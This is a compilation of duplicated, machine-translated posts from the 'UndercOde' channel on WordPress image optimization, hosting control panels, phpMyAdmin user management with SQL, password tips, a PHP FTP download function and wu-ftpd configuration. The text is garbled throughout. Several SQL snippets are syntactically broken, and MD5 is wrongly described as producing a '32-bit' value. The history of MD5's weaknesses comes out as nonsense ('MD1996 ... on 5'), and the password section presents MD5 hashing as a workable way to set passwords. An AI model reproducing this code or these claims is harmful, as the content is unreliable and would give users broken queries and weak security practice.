β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How to optimize your images in WordPress:
t.me/UndercodeTesting
π¦ ππΌππ πππΈβπ :
1) Create image for website
If you are familiar with photo editing applications like Photoshop, you may prefer to create images for use on your website. Note that these applications often have the option to save pictures in a web-friendly format. In Photoshop, you can do this by clicking File> Save as Web and Device .
> When saving images, you may also be familiar with different file formats. The most common formats are JPG, PNG, and GIF.
> JPG format images are very suitable for general photos User photos and background images. They support multiple colors and gradients-all without bloating the file size.
> the image is usually larger. However, they supported transparency - Excellent image quality - making them the perfect choice for logo.
>Finally, GIF images may have a limited palette, but they are also the smallest in terms of file size. GIF images are mainly used for flat color graphics and animation.
2) Before uploading images to your WordPress media library, it's best to use a web-based tool like TinyPNG to reduce the file size. You have to do is go to their website , upload your picture and wait for completion of compression. When you are done, just click the download button and upload the compressed file to WordPress.
3) Use image compression plugins (EWWW Image Optimizer, Smush It and ImageOptim)
If you want to use a large number of images for WordPress, it is good practice to save with the correct image format and use TinyPNG. But what if you already have an unoptimized image library on WordPress? Fortunately, there are many plug-in image compression such EWWW image optimization , Sm it and imagine the image optimizer .
> If you want to automate image compression for new uploads, EWWW Image Optimizer is your plugin. After installing the plugin, every image you upload will be automatically compressed. You can also access settings such as optimization level, auto-sizing.
4) Alternative image compression plugin
ImageRecycle is a low-rating image optimization plugin for WordPress. It works very similarly to others who compress images without affecting quality. It is not only able to optimize images, but also for PDF files.
5) ShortPixel is another popular choice for image optimization . ShortPixel plugin can improve website loading speed by optimizing images. It can reduce the size of the image while maintaining the original quality. You have the flexibility to control the image.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How to optimize your images in WordPress:
t.me/UndercodeTesting
π¦ ππΌππ πππΈβπ :
1) Create image for website
If you are familiar with photo editing applications like Photoshop, you may prefer to create images for use on your website. Note that these applications often have the option to save pictures in a web-friendly format. In Photoshop, you can do this by clicking File> Save as Web and Device .
> When saving images, you may also be familiar with different file formats. The most common formats are JPG, PNG, and GIF.
> JPG format images are very suitable for general photos User photos and background images. They support multiple colors and gradients-all without bloating the file size.
> the image is usually larger. However, they supported transparency - Excellent image quality - making them the perfect choice for logo.
>Finally, GIF images may have a limited palette, but they are also the smallest in terms of file size. GIF images are mainly used for flat color graphics and animation.
2) Before uploading images to your WordPress media library, it's best to use a web-based tool like TinyPNG to reduce the file size. You have to do is go to their website , upload your picture and wait for completion of compression. When you are done, just click the download button and upload the compressed file to WordPress.
3) Use image compression plugins (EWWW Image Optimizer, Smush It and ImageOptim)
If you want to use a large number of images for WordPress, it is good practice to save with the correct image format and use TinyPNG. But what if you already have an unoptimized image library on WordPress? Fortunately, there are many plug-in image compression such EWWW image optimization , Sm it and imagine the image optimizer .
> If you want to automate image compression for new uploads, EWWW Image Optimizer is your plugin. After installing the plugin, every image you upload will be automatically compressed. You can also access settings such as optimization level, auto-sizing.
4) Alternative image compression plugin
ImageRecycle is a low-rating image optimization plugin for WordPress. It works very similarly to others who compress images without affecting quality. It is not only able to optimize images, but also for PDF files.
5) ShortPixel is another popular choice for image optimization . ShortPixel plugin can improve website loading speed by optimizing images. It can reduce the size of the image while maintaining the original quality. You have the flexibility to control the image.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ What does WHCP do?
fb.com/UndercOdeTestingCompany
>WHCP is software that provides users with an easy way to manage their web hosting accounts.
> It is based on the GUI , which means you can use the familiar icon-driven click on the system to complete the task.
> At a deeper level, it gives you quick access to many controls that you can use to configure and maintain your web hosting account.
>For example, from WHCP, you can install web applications, configure DNS settings, manage email accounts, view resource usage, and more.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ What does WHCP do?
fb.com/UndercOdeTestingCompany
>WHCP is software that provides users with an easy way to manage their web hosting accounts.
> It is based on the GUI , which means you can use the familiar icon-driven click on the system to complete the task.
> At a deeper level, it gives you quick access to many controls that you can use to configure and maintain your web hosting account.
>For example, from WHCP, you can install web applications, configure DNS settings, manage email accounts, view resource usage, and more.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Plesk and cPanel are the most widely used WHCP
t.me/UndercOdeTesting
> Both Plesk and cPanel are well-established WHCPs, which means that they can do almost everything users need to manage their websites. However, there are different levels of pricing as well.
> Some web hosting companies may choose a version with fewer features and may even choose not to update to the latest version of WHCP. In terms of functionality, this may cause some differences.
> The relationship between cPanel and Plesk is more a matter of personal preference. Honestly, undercode used both and have found that there is a greater difference in enabling or disabling web hosting from the control panel.
π¦ So which WHCP should I choose?
> Web hosting companies must pay Plesk or cPanel depending on the type of license they use. The price depends on the software version they choose and the number of licenses required. This cost needs to be passed on to the user (ie us) by the web hosting company to keep them profitable.
> Price is usually demand driven and as competitive as the web hosting industry, so there are always competitors trying to weaken the main players. This healthy competition keeps companies honest about pricing-unless there is a monopoly.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Plesk and cPanel are the most widely used WHCP
t.me/UndercOdeTesting
> Both Plesk and cPanel are well-established WHCPs, which means that they can do almost everything users need to manage their websites. However, there are different levels of pricing as well.
> Some web hosting companies may choose a version with fewer features and may even choose not to update to the latest version of WHCP. In terms of functionality, this may cause some differences.
> The relationship between cPanel and Plesk is more a matter of personal preference. Honestly, undercode used both and have found that there is a greater difference in enabling or disabling web hosting from the control panel.
π¦ So which WHCP should I choose?
> Web hosting companies must pay Plesk or cPanel depending on the type of license they use. The price depends on the software version they choose and the number of licenses required. This cost needs to be passed on to the user (ie us) by the web hosting company to keep them profitable.
> Price is usually demand driven and as competitive as the web hosting industry, so there are always competitors trying to weaken the main players. This healthy competition keeps companies honest about pricing-unless there is a monopoly.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Why does Sever's speed matter?
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) faster website = lower bounce rate
As a business, low bounce rates are critical. Bounce rate is a simple metric that measures how many people abandon your site before clicking on any content. They either give up or leave, or they can't find what they want. Either way, this is bad news.
2) Faster Website = Better User Experience
3) Faster website = better sales
Of course, we don't naively attribute the entire boost to half a second of site speed. But this is definitely a factor. Target's spike in online sales is for a variety of reasons. But the core aspect is their superior website performance. They know the world is turning to e-commerce and mobile phones.
> So they put the infrastructure in place to provide the fastest and most powerful user experience.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Why does Sever's speed matter?
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) faster website = lower bounce rate
As a business, low bounce rates are critical. Bounce rate is a simple metric that measures how many people abandon your site before clicking on any content. They either give up or leave, or they can't find what they want. Either way, this is bad news.
2) Faster Website = Better User Experience
3) Faster website = better sales
Of course, we don't naively attribute the entire boost to half a second of site speed. But this is definitely a factor. Target's spike in online sales is for a variety of reasons. But the core aspect is their superior website performance. They know the world is turning to e-commerce and mobile phones.
> So they put the infrastructure in place to provide the fastest and most powerful user experience.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ User management in MySQL database using phpMyAdmin
> Part 1
UndercOde.org
1) What is phpMyAdmin?
phpMyAdmin is a web-based open source PHP tool for MySQL database management.
2) What method is used in this guide?
You can use two methods for database management in phpMyAdmin:
> Management via phpMyAdmin interface
Perform management via SQL queries
This guide will show you how to use each of these two methods to perform SQL operations on your user base.
> Sample software in this guide
Among the most popular CMS and forum scripts, this guide chooses the WordPress - XMB forum , although the tutorial can usually be easily applied to any user-based site software.
> This guide will show you how to use both methods for the database user table of each script
π¦ ππΌππ πππΈβπ :
phpMyAdmin user management WordPress
1) Interface method
> Log into your cPanel account (or any other web hosting control panel for your domain). Find phpMyAdmin under the Database group and click on the phpMyAdmin icon:
> The phpMyAdmin web interface will open in a new window. After entering, select the database you need to process from the left column. example, the database is wptest_wp234. click it.
> When you open the database, you will see a list of all tables on the left sidebar, while the main page displays a list of the same tables (each row) with a browse / edit tool. To access your user list, click on the "wp_users" table and look for the user list.
> You may need to change your credentials, email , website URL and more. Start editing your information by clicking Edit (a pencil icon next to the link) to open the row associated with your user account.
>To change the password, you need to select MD5 from the drop-down menu. Write a strong password (you can use a random password generator for better results). When done, save your changes.
> And NBow MD5 is an abbreviation. Message digest (algorithm) v. 5 , an encrypted hash function that returns a 32-bit value. The "user_pass" field will automatically convert your new password into an MD5 32-bit numeric string.
If you need to get rid of all spam accounts, just return to the "wp_users" table, select the selected user row, and click the "Delete" button at the bottom of the page. If you need to delete an individual user, simply click the "Delete" link on the user row
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ User management in MySQL database using phpMyAdmin
> Part 1
UndercOde.org
1) What is phpMyAdmin?
phpMyAdmin is a web-based open source PHP tool for MySQL database management.
2) What method is used in this guide?
You can use two methods for database management in phpMyAdmin:
> Management via phpMyAdmin interface
Perform management via SQL queries
This guide will show you how to use each of these two methods to perform SQL operations on your user base.
> Sample software in this guide
Among the most popular CMS and forum scripts, this guide chooses the WordPress - XMB forum , although the tutorial can usually be easily applied to any user-based site software.
> This guide will show you how to use both methods for the database user table of each script
π¦ ππΌππ πππΈβπ :
phpMyAdmin user management WordPress
1) Interface method
> Log into your cPanel account (or any other web hosting control panel for your domain). Find phpMyAdmin under the Database group and click on the phpMyAdmin icon:
> The phpMyAdmin web interface will open in a new window. After entering, select the database you need to process from the left column. example, the database is wptest_wp234. click it.
> When you open the database, you will see a list of all tables on the left sidebar, while the main page displays a list of the same tables (each row) with a browse / edit tool. To access your user list, click on the "wp_users" table and look for the user list.
> You may need to change your credentials, email , website URL and more. Start editing your information by clicking Edit (a pencil icon next to the link) to open the row associated with your user account.
>To change the password, you need to select MD5 from the drop-down menu. Write a strong password (you can use a random password generator for better results). When done, save your changes.
> And NBow MD5 is an abbreviation. Message digest (algorithm) v. 5 , an encrypted hash function that returns a 32-bit value. The "user_pass" field will automatically convert your new password into an MD5 32-bit numeric string.
If you need to get rid of all spam accounts, just return to the "wp_users" table, select the selected user row, and click the "Delete" button at the bottom of the page. If you need to delete an individual user, simply click the "Delete" link on the user row
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ User management in MySQL database using phpMyAdmin
> Part 2
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
SQL query method
1) phpMyAdmin allows the database manager to execute SQL statements directly on the web interface. When you open the database in phpMyAdmin you will see a series of tabs on the main page-Browse, Structure, SQL, Search, Insert, Export, Import, Action: Click the SQL tab to access the SQL Web shell, Which writes and runs your statement. See the 4th screenshot in this guide for the exact tab location.
The following is a 3 snippet that can be used to edit a user account via SQL operations.
Note: 'youraccountname' refers to your hosting account username. This is the most common form of database identification in a shared hosting environment, where each database is assigned to a specific user. Therefore, an underscore ("_") between your hosting account user name and database name. There are other forms of database identification that use only the database name. The convention you will use is the one shown in the phpMyAdmin installation.
1. Change user password (MD5):
wp_users` SET`user_pass` = MD5 ('testuserpasswhere') WHERE`ID` = 2;
What does this code do?
Update `youraccountname_databasename``wp_users`edits and update the 'wp_users' table in database 'youraccountname_databasename'.
SET`user_pass` = MD5 ('testuserpasswhere') sets the value of the attribute 'user_pass' to the MD5 hash string of 'testuserpasswhere'.
WHERE`ID` = 2; tells you that the user ID being applied for modification is
> Obviously this is an example ID; it can be any user ID.
2) Modify user information:
> UPDATE`youraccountname_databasename`.wp_users SET`user_login` = 'newusername', user_nicename = 'newusername', user_email = ' newusername@domain.com ' WHERE`ID` = 1;
What does this code do?
> As for the first snippet, UPDATEline specifies which table and in which database it will modify.
> The SET function here runs different properties on 3: it sets' user_login 'and' user_nicename 'to the new values' newusername' and 'user_email' to ' newusername@domain.com '. Please note that 'user_login' and ' user_nicename 'is two different attributes with the same value: the former is the username used to log in, and the latter is the name that will be displayed on your website pages. Example:' greatboy84 'is the login name, and' Frank Span 'is on the page Displayed name.
WHERE`ID` = 1; tells you that the user ID you modified is number # 1.
3) Delete spam account:
Remove from youraccountname_databasename. `wp_users`ID = 2
What does this code do?
> The first line tells you that you will delete the contents of the 'wp_users' table from database 'youraccountname_databasename'.
WHERE`ID` = 2 means the user ID you want to delete is 2
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ User management in MySQL database using phpMyAdmin
> Part 2
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
SQL query method
1) phpMyAdmin allows the database manager to execute SQL statements directly on the web interface. When you open the database in phpMyAdmin you will see a series of tabs on the main page-Browse, Structure, SQL, Search, Insert, Export, Import, Action: Click the SQL tab to access the SQL Web shell, Which writes and runs your statement. See the 4th screenshot in this guide for the exact tab location.
The following is a 3 snippet that can be used to edit a user account via SQL operations.
Note: 'youraccountname' refers to your hosting account username. This is the most common form of database identification in a shared hosting environment, where each database is assigned to a specific user. Therefore, an underscore ("_") between your hosting account user name and database name. There are other forms of database identification that use only the database name. The convention you will use is the one shown in the phpMyAdmin installation.
1. Change user password (MD5):
wp_users` SET`user_pass` = MD5 ('testuserpasswhere') WHERE`ID` = 2;
What does this code do?
Update `youraccountname_databasename``wp_users`edits and update the 'wp_users' table in database 'youraccountname_databasename'.
SET`user_pass` = MD5 ('testuserpasswhere') sets the value of the attribute 'user_pass' to the MD5 hash string of 'testuserpasswhere'.
WHERE`ID` = 2; tells you that the user ID being applied for modification is
> Obviously this is an example ID; it can be any user ID.
2) Modify user information:
> UPDATE`youraccountname_databasename`.wp_users SET`user_login` = 'newusername', user_nicename = 'newusername', user_email = ' newusername@domain.com ' WHERE`ID` = 1;
What does this code do?
> As for the first snippet, UPDATEline specifies which table and in which database it will modify.
> The SET function here runs different properties on 3: it sets' user_login 'and' user_nicename 'to the new values' newusername' and 'user_email' to ' newusername@domain.com '. Please note that 'user_login' and ' user_nicename 'is two different attributes with the same value: the former is the username used to log in, and the latter is the name that will be displayed on your website pages. Example:' greatboy84 'is the login name, and' Frank Span 'is on the page Displayed name.
WHERE`ID` = 1; tells you that the user ID you modified is number # 1.
3) Delete spam account:
Remove from youraccountname_databasename. `wp_users`ID = 2
What does this code do?
> The first line tells you that you will delete the contents of the 'wp_users' table from database 'youraccountname_databasename'.
WHERE`ID` = 2 means the user ID you want to delete is 2
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ phpMyAdmin XMB Forum User
Management: part 3
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) Interface method
The process is similar to WordPress user management.
Log in to your domain control panel and open phpMyAdmin. Select your forum database and look for the form ' xmb_members ': it contains the membership accounts of the forum.
2) Click "Edit" on the line associated with your user account, then edit your user information (see image below). Click the "Start" button to save your changes.
π¦ SQL query method
The following 2 code snippets show how to edit or delete an XMB user account through MySQL.
1) Edit XMB Member Account:
Update youraccountname_xmbdatabase`.xmb_members SET`username` = 'bigsmurf85', password` the MD5 = ( 'xmbuser178pass'), email` =' testmail@gmx.com ', site` =' HTTP: // Domain .com ', location =' US'WHERE`uid` = 139;
Like the WordPress example above, this SQL code updates the user's current information to the new specified value.
2) Delete XMB member account:
Remove from youraccountname_xmbdatabase. `xmb_members`uid = 178
The first line indicates that you want to delete one or more user IDs (here 'uid') from the database 'xmb_members'. The second specifies the user ID number, which in this case is 178.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ phpMyAdmin XMB Forum User
Management: part 3
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) Interface method
The process is similar to WordPress user management.
Log in to your domain control panel and open phpMyAdmin. Select your forum database and look for the form ' xmb_members ': it contains the membership accounts of the forum.
2) Click "Edit" on the line associated with your user account, then edit your user information (see image below). Click the "Start" button to save your changes.
π¦ SQL query method
The following 2 code snippets show how to edit or delete an XMB user account through MySQL.
1) Edit XMB Member Account:
Update youraccountname_xmbdatabase`.xmb_members SET`username` = 'bigsmurf85', password` the MD5 = ( 'xmbuser178pass'), email` =' testmail@gmx.com ', site` =' HTTP: // Domain .com ', location =' US'WHERE`uid` = 139;
Like the WordPress example above, this SQL code updates the user's current information to the new specified value.
2) Delete XMB member account:
Remove from youraccountname_xmbdatabase. `xmb_members`uid = 178
The first line indicates that you want to delete one or more user IDs (here 'uid') from the database 'xmb_members'. The second specifies the user ID number, which in this case is 178.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Password security tips
T.me/UndercOdeTesting
1) in the MD5 hash function, the MD1996 algorithm was first proven to be vulnerable on 5, and more reports were shared with the public over the years. When we say "conflict", we expect that different strings (ie passwords) have the same hash value. It's informative and can't be described in just one paragraph in a short guide, but don't worry-MD5 can still save you headaches, as described in this guide.
2) after changing the password in phpMyAdmin (using MD5 encryption), the next security measure to take is to change the password again in the WordPress user profile. In fact, WordPress uses a algorithm called phpass , which includes more secure and therefore less fragile algorithms.
π¦'Lazy' trick!
Laziness does not necessarily lead to the wrong choice. The techniques we've developed to save time are more easily translated into website efficiency and higher traffic than ever before, so let's not ignore this paragraph.
The "lazy trick" is to use the spammer's user account to create an account of a fictional character or friend. how about it?
The procedure is simple-you just need to open the user list in the database (you can use interface methods to perform such simple tasks), click the Edit button for the selected user row and edit the following fields (leave the IDs as they are):
user_login, user_pass, user_nicename, user_email
Optional details (user_url, user_registered, etc.)
Alternatively, you can use the SQL query code snippet for user account editing, which I have shown you earlier in this guide.
π¦ When will this technique become useful?
Oh, let's cite some important examples: you may need to use fake accounts on your forum or blog to test new plugins, hacks and mods, or you want to register an account for your busy friend to prepare to use them. In addition, you may need to use a "forum robot" to publish board rules, some rules, etc. Really, your imagination is the limit. :)
Bonus SQL Code: Create User Account
A small amount of extra bonus won't hurt, right? Here are two SQL snippets: the first one creates a new user account WordPress site for your users , and the second one is a new XMB forum user.
Inserted into youraccountname_databasename.wp_users (user_login, user_pass, user_nicename, user_email, user_registered, userstatus) values ββ(newusername3, MD5 (newpassword3ally), ',' mallybally@domain.com ',
'2012-04-13 00:00:00',
'1'
)
The sample code will create a new user and assign values ββ(user information) to the attributes 'user_login', 'user_pass', 'user_nicename', 'user_email', 'user_registered' and 'user_status'.
π¦ To create a new XMB forum member:
Insert youraccountname_databasename. xmb_members ( username, password, email, status, location) values ββ('fairyland', MD5 ('fairypass123'), ' fairyland@domain.com ', 'Member', 'United States')
Have fun! :)
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Password security tips
T.me/UndercOdeTesting
1) in the MD5 hash function, the MD1996 algorithm was first proven to be vulnerable on 5, and more reports were shared with the public over the years. When we say "conflict", we expect that different strings (ie passwords) have the same hash value. It's informative and can't be described in just one paragraph in a short guide, but don't worry-MD5 can still save you headaches, as described in this guide.
2) after changing the password in phpMyAdmin (using MD5 encryption), the next security measure to take is to change the password again in the WordPress user profile. In fact, WordPress uses a algorithm called phpass , which includes more secure and therefore less fragile algorithms.
π¦'Lazy' trick!
Laziness does not necessarily lead to the wrong choice. The techniques we've developed to save time are more easily translated into website efficiency and higher traffic than ever before, so let's not ignore this paragraph.
The "lazy trick" is to use the spammer's user account to create an account of a fictional character or friend. how about it?
The procedure is simple-you just need to open the user list in the database (you can use interface methods to perform such simple tasks), click the Edit button for the selected user row and edit the following fields (leave the IDs as they are):
user_login, user_pass, user_nicename, user_email
Optional details (user_url, user_registered, etc.)
Alternatively, you can use the SQL query code snippet for user account editing, which I have shown you earlier in this guide.
π¦ When will this technique become useful?
Oh, let's cite some important examples: you may need to use fake accounts on your forum or blog to test new plugins, hacks and mods, or you want to register an account for your busy friend to prepare to use them. In addition, you may need to use a "forum robot" to publish board rules, some rules, etc. Really, your imagination is the limit. :)
Bonus SQL Code: Create User Account
A small amount of extra bonus won't hurt, right? Here are two SQL snippets: the first one creates a new user account WordPress site for your users , and the second one is a new XMB forum user.
Inserted into youraccountname_databasename.wp_users (user_login, user_pass, user_nicename, user_email, user_registered, userstatus) values ββ(newusername3, MD5 (newpassword3ally), ',' mallybally@domain.com ',
'2012-04-13 00:00:00',
'1'
)
The sample code will create a new user and assign values ββ(user information) to the attributes 'user_login', 'user_pass', 'user_nicename', 'user_email', 'user_registered' and 'user_status'.
π¦ To create a new XMB forum member:
Insert youraccountname_databasename. xmb_members ( username, password, email, status, location) values ββ('fairyland', MD5 ('fairypass123'), ' fairyland@domain.com ', 'Member', 'United States')
Have fun! :)
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Download file from ftp server:
t.me/UndercodeTesting
π¦ ππΌππ πππΈβπ :
<? php
/ **
* function name php_ftp_download
* function download file from ftp server
* entry parameters
* filename file name to download, including path
* /
function php_ftp_download ($ filename) {
$ phpftp_host = "ftplocalhost"; // server Address
$ phpftp_port = 21; // server port
$ phpftp_user = "name"; // username
$ phpftp_passwd = "passwrd"; // password
$ ftp_path = dirname ($ filename). "/"; // get path
$ select_file = basename ($ filename); // Get the file name
$ ftp = ftp_connect ($ phpftp_host, $ phpftp_port); // Connect to ftp server
if ($ ftp) {
if (ftp_login ($ ftp, $ phpftp_user, $ phpftp_passwd)) { // log in
if (@ftp_chdir ($ ftp,$ ftp_path)) {// enter the specified path
$ tmpfile = tempnam (getcwd (). "/", "temp"); // create unique temporary file
if (ftp_get ($ ftp, $ tmpfile, $ select_file, FTP_BINARY)) {// download the specified file to a temporary File
ftp_quit ($ ftp); // close the connection
header ("Content-Type: application / octet-stream");
header ("Content-Disposition: attachment; filename =". $ Select_file);
readfile ($ tmpfile);
unlink ($ tmpfile); // delete temporary file
exit;
}
unlink ($ tmpfile);
}
}
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Download file from ftp server:
t.me/UndercodeTesting
π¦ ππΌππ πππΈβπ :
<? php
/ **
* function name php_ftp_download
* function download file from ftp server
* entry parameters
* filename file name to download, including path
* /
function php_ftp_download ($ filename) {
$ phpftp_host = "ftplocalhost"; // server Address
$ phpftp_port = 21; // server port
$ phpftp_user = "name"; // username
$ phpftp_passwd = "passwrd"; // password
$ ftp_path = dirname ($ filename). "/"; // get path
$ select_file = basename ($ filename); // Get the file name
$ ftp = ftp_connect ($ phpftp_host, $ phpftp_port); // Connect to ftp server
if ($ ftp) {
if (ftp_login ($ ftp, $ phpftp_user, $ phpftp_passwd)) { // log in
if (@ftp_chdir ($ ftp,$ ftp_path)) {// enter the specified path
$ tmpfile = tempnam (getcwd (). "/", "temp"); // create unique temporary file
if (ftp_get ($ ftp, $ tmpfile, $ select_file, FTP_BINARY)) {// download the specified file to a temporary File
ftp_quit ($ ftp); // close the connection
header ("Content-Type: application / octet-stream");
header ("Content-Disposition: attachment; filename =". $ Select_file);
readfile ($ tmpfile);
unlink ($ tmpfile); // delete temporary file
exit;
}
unlink ($ tmpfile);
}
}
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Set up FTP server with wu-ftpd : FULL BY UNDERCODE PART 1
fb.com/UndercodeTestingCompany
π¦πβπππΈπππππΈπππβ & βπβ:
I) Introduction
When we set up the website need to provide download function, in addition to using http way to connect, can also provide additional services for users to directly connect ftp download. In fact, ftp is a long-established service that is designed to transfer data between two computers to avoid too many remote executions. If the file to be transmitted is relatively large, if it is connected via http, it will occupy some website resources (such as the number of people who can connect), and then ftp will be used. ftp is a TCP / IP-based application, so the general ftp service program is implemented inlined inetd.
FTP is divided into two parts, one is a server-side program, and the other is a user-side program. There are many ftp service programs on Unix, and the built-in versions of different operating systems are also different. Common examples include wu-ftpd, proftpd, Troll ftpd, ncftpd, and Bero ftpd. The most popular and popular one is wu-ftpd, which was originally developed by wuarchive.wustl.edu of the University of Washington. It is a program that considers efficiency and stability. It provides source code and open academic units. Free to use.
Second, the installation and setting
wu-ftpd installation is very easy, most versions of Linux include the rpm package of wu-ftpd, you can specify loading when installing Linux. If you want to compile the source code yourself, you can also download the latest version of the source code package at ftp://ftp.wu-ftpd.org.
After installation, you can use the ckconfig command to check whether it has been installed correctly. You can specify the login directory of the ftp user in / etc / passwd.
wu-ftpd mainly has the following 6 configuration files:
ftpaccess (main configuration file, control access permissions)
ftpconvertions (configuration file compression / decompression conversion)
ftpgroups (set the groups defined by FTP itself)
ftphosts (set individual user permissions)
ftpservers (set different IP / Domain Names to correspond to different virtual hosts)
ftpusers (set which accounts cannot be connected
via ftp) Let's introduce them one by one.
Etc / etc / ftpaccess (the main configuration file of wu-ftpd)
class--Defines a group, the usage is as follows:
class <type> <user address> [<user address> ...]
Group users defined by class can connect Come in, you can use multi-layered classes to regulate which groups of users can come from which places. There are three important types here, real and anonymous guests. If real is not listed in the definition, then any real general user on this machine cannot connect with his own account. If anonymous is not defined, it means that people without an account will not be connected. If guests are defined, then people in the guest group can come up. In addition, <user address> refers to the IP address that users from ftp will use, and you can set it yourself. The following are some examples:
class all real, guest, anonymous *
Defines a class named all, which contains three types of people, all connected users of IP (that is, everyone includes)
class local real localhost loopback
local That is, only real users can connect from the local machine to the
class remote guest, anonymous *
remote This class contains guest and anonymous users from any place, but real users are not counted
class rmtuser real! *. example.com
rmtuser This class contains real users from outside (except example.com)
autogroup--automatic corresponding groups, the usage is as follows:
autogroup [β¦β¦]
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Set up FTP server with wu-ftpd : FULL BY UNDERCODE PART 1
fb.com/UndercodeTestingCompany
π¦πβπππΈπππππΈπππβ & βπβ:
I) Introduction
When we set up the website need to provide download function, in addition to using http way to connect, can also provide additional services for users to directly connect ftp download. In fact, ftp is a long-established service that is designed to transfer data between two computers to avoid too many remote executions. If the file to be transmitted is relatively large, if it is connected via http, it will occupy some website resources (such as the number of people who can connect), and then ftp will be used. ftp is a TCP / IP-based application, so the general ftp service program is implemented inlined inetd.
FTP is divided into two parts, one is a server-side program, and the other is a user-side program. There are many ftp service programs on Unix, and the built-in versions of different operating systems are also different. Common examples include wu-ftpd, proftpd, Troll ftpd, ncftpd, and Bero ftpd. The most popular and popular one is wu-ftpd, which was originally developed by wuarchive.wustl.edu of the University of Washington. It is a program that considers efficiency and stability. It provides source code and open academic units. Free to use.
Second, the installation and setting
wu-ftpd installation is very easy, most versions of Linux include the rpm package of wu-ftpd, you can specify loading when installing Linux. If you want to compile the source code yourself, you can also download the latest version of the source code package at ftp://ftp.wu-ftpd.org.
After installation, you can use the ckconfig command to check whether it has been installed correctly. You can specify the login directory of the ftp user in / etc / passwd.
wu-ftpd mainly has the following 6 configuration files:
ftpaccess (main configuration file, control access permissions)
ftpconvertions (configuration file compression / decompression conversion)
ftpgroups (set the groups defined by FTP itself)
ftphosts (set individual user permissions)
ftpservers (set different IP / Domain Names to correspond to different virtual hosts)
ftpusers (set which accounts cannot be connected
via ftp) Let's introduce them one by one.
Etc / etc / ftpaccess (the main configuration file of wu-ftpd)
class--Defines a group, the usage is as follows:
class <type> <user address> [<user address> ...]
Group users defined by class can connect Come in, you can use multi-layered classes to regulate which groups of users can come from which places. There are three important types here, real and anonymous guests. If real is not listed in the definition, then any real general user on this machine cannot connect with his own account. If anonymous is not defined, it means that people without an account will not be connected. If guests are defined, then people in the guest group can come up. In addition, <user address> refers to the IP address that users from ftp will use, and you can set it yourself. The following are some examples:
class all real, guest, anonymous *
Defines a class named all, which contains three types of people, all connected users of IP (that is, everyone includes)
class local real localhost loopback
local That is, only real users can connect from the local machine to the
class remote guest, anonymous *
remote This class contains guest and anonymous users from any place, but real users are not counted
class rmtuser real! *. example.com
rmtuser This class contains real users from outside (except example.com)
autogroup--automatic corresponding groups, the usage is as follows:
autogroup [β¦β¦]
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Facebook
UndercOde Testing Company
UndercOde Testing Company. 94 likes Β· 6 talking about this. Local service
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦π¦ Set up FTP server with wu-ftpd : FULL BY UNDERCODE
fb.com/UndercodeTestingCompany
π¦ P A R T 2
When you define those that belong to the same A user of a class will be mapped to a corresponding group once connected, so you can use Unix file permissions to restrict a group of people. deny--Rejects connections
to certain addresses, the usage is as follows:
deny <address to refuse connections> <information file>
prohibits some machines from connecting, and displays <information file>. For example:
deny 210.62.146. *: 255.255.255.254 /etc/reject.msg
guestgroup--set guest group
guestuser--set guest account
realgroup--set real group
realuser--set real account
nice-- Set how much priority is given to certain classes, the usage is as follows:
nice
In Linux, the value of nice is -20 (highest priority) to 19 (last processing). Here you can specify a negative value to increase the priority of a certain class.
defumask--Set the umask of a class, the usage is as follows:
defumask []
umask is the permission mask of the file when the file is created
tcpwindow--Set the size of tcpwindow
keepalive--Set whether to use TCP SO_KEEPALIVE to control the disconnection
timeout--Set the connection timeout, the usage is as follows:
timeout accept <second> timeout connect
, the default
timeout connect <second>
connection establishment timeout, Preset 120 seconds
timeout data <second>
data transmission timeout, preset 1200 seconds
timeout idle <second>
user daze timeout, preset 900 seconds
file-limit--Limit a class to only a few files, the usage is as follows:
file- limit [] []
limits the number of access files for a certain class, including in (upload), out (download), total raw represents the result of the entire transfer, not just data files. For example:
file-limit out 20 lvfour
limit users of the lvfour class can only download a maximum of 20 files
byte-limit-limit a class to only a few bytes, usage is similar to file-limit
limit-time-limit one How long can the connection last, the usage is as follows:
limit-time {* | anonymous | guest} <minute>
In order to prevent someone from hanging on the station, you can use this method to limit the user's online time, for example:
limit-time guest 5
